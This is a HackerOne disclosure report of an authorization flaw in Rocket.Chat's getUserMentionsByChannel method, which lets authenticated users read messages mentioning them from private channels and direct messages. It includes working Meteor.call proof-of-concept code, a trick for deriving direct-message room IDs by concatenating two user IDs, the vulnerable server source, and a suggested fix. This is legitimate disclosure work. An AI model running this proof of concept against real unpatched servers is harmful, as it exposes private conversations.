hackerone / gronke / H1:1410246
History: Nov 25, 2021 - 3:00 p.m.

Rocket.Chat: getUserMentionsByChannel leaks messages with mention from private channel

2021-11-25 15:00:53
gronke
hackerone.com
10
Tags: rocket.chat, getusermentionsbychannel, private channels, direct messages, information disclosure, vulnerability, authentication

EPSS

0.001

Percentile

32.8%

Summary

The getUserMentionsByChannel Meteor server method discloses messages from private channels and direct messages regardless of the user's access permission to the room.

Description

When calling the getUserMentionsByChannel method, the server does not check the user's access to the given room and returns all messages in that room in which the user has been mentioned.

Meteor.call(
  "getUserMentionsByChannel",
  { roomId: "<TARGET_ROOM>" },
  console.log
);

The issue was found in app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23 where roomId is verified to be a String only.

Meteor.methods({
	getUserMentionsByChannel({ roomId, options }) {
		check(roomId, String);

		if (!Meteor.userId()) {
			throw new Meteor.Error('error-invalid-user', 'Invalid user', { method: 'getUserMentionsByChannel' });
		}

		const room = Rooms.findOneById(roomId);

		if (!room) {
			throw new Meteor.Error('error-invalid-room', 'Invalid room', { method: 'getUserMentionsByChannel' });
		}

		const user = Users.findOneById(Meteor.userId());

		return Messages.findVisibleByMentionAndRoomId(user.username, roomId, options).fetch();
	},
});

The server will return all messages the requesting user has been @ mentioned in.

Releases Affected:

Steps To Reproduce (from initial installation to vulnerability):

  1. Login to Rocket.Chat
  2. Obtain Room Id
    1. Guess Direct Message roomId from User IDs
    2. Leak private Message ID with unknown vulnerability
  3. Call getUserMentionsByChannel with given { roomId: "<Value>" }
  4. Read the messages in which the requesting user was mentioned from the console.log output

Supporting Material/References:

The following example leaks a private message between two users to a third account, trudy, who performs the requests from an authenticated client, disclosing a direct message between alice and bob.

Meteor.user().username
// > 'trudy'
let alice = 'kYfzDMQLyPFjS9ASb';
let bob = 'zZnrfd2RvcWhspr6S';
Meteor.call(
  "getUserMentionsByChannel",
  { roomId: `${alice}${bob}` }, // direct message channel: concatenation of both user IDs
  (err, data) => console.log(
  	data
  	  .map((m) => `${m._id} ${m.u.username} (${m.ts.toGMTString()}): ${m.msg}`)
  	  .join("\n")
  )
);
// > Yp6NoMZk34mnQZiBR alice (Thu, 25 Nov 2021 14:17:25 UTC): Mention @trudy somewhere

Meteor.call("getMessages", ["Yp6NoMZk34mnQZiBR"], (err, data) => console.log(err.message))
// > Not allowed [error-not-allowed]

Suggested mitigation

  • Check that the calling user has permission to read messages from the room given in the { roomId } method argument before querying mentions.
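As an added illustration of this mitigation (not Rocket.Chat's own code), the following self-contained JavaScript stand-in for the method keeps the vulnerable shape from the listing above next to a hardened shape that checks room access before querying mentions. The rooms, subscriptions, messages and the membership-based canAccessRoom helper are constructed assumptions standing in for Rocket.Chat's collections and access logic.

```javascript
// Constructed sample data (not from the report): a direct message between
// alice and bob, a public channel, the room memberships, and two @mentions.
const rooms = {
  aliceBobDM: { _id: 'aliceBobDM', t: 'd' }, // direct message, alice <-> bob
  general: { _id: 'general', t: 'c' },       // public channel
};
const subscriptions = [
  { rid: 'aliceBobDM', username: 'alice' },
  { rid: 'aliceBobDM', username: 'bob' },
  { rid: 'general', username: 'alice' },
  { rid: 'general', username: 'trudy' },
];
const messages = [
  { _id: 'm1', rid: 'aliceBobDM', u: { username: 'alice' }, msg: 'Mention @trudy somewhere', mentions: ['trudy'] },
  { _id: 'm2', rid: 'general', u: { username: 'alice' }, msg: 'hi @trudy', mentions: ['trudy'] },
];

// Stand-in for Messages.findVisibleByMentionAndRoomId: filters by room and mention only,
// so it offers no protection on its own.
function findVisibleByMentionAndRoomId(username, roomId) {
  return messages.filter((m) => m.rid === roomId && m.mentions.includes(username));
}

// Vulnerable shape: verifies that the room exists, never that the caller may read it.
function getUserMentionsByChannelVulnerable(caller, { roomId }) {
  if (!rooms[roomId]) throw new Error('error-invalid-room');
  return findVisibleByMentionAndRoomId(caller, roomId);
}

// Assumed access rule: public channels are readable by anyone; private channels and
// direct messages require a subscription (membership) for the caller.
function canAccessRoom(room, username) {
  if (room.t === 'c') return true;
  return subscriptions.some((s) => s.rid === room._id && s.username === username);
}

// Hardened shape: same lookups, plus the room-access check the report asks for.
function getUserMentionsByChannelFixed(caller, { roomId }) {
  const room = rooms[roomId];
  if (!room) throw new Error('error-invalid-room');
  if (!canAccessRoom(room, caller)) throw new Error('error-not-allowed');
  return findVisibleByMentionAndRoomId(caller, roomId);
}
```

With this data, trudy still receives alice's direct message from the vulnerable function but gets error-not-allowed from the fixed one, while her mention in the public channel remains readable.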

Impact

Authenticated users can disclose all messages they were mentioned in from private channels and direct messages they should not have access to.

Fixed in

We have fixed this issue in version 5.0.
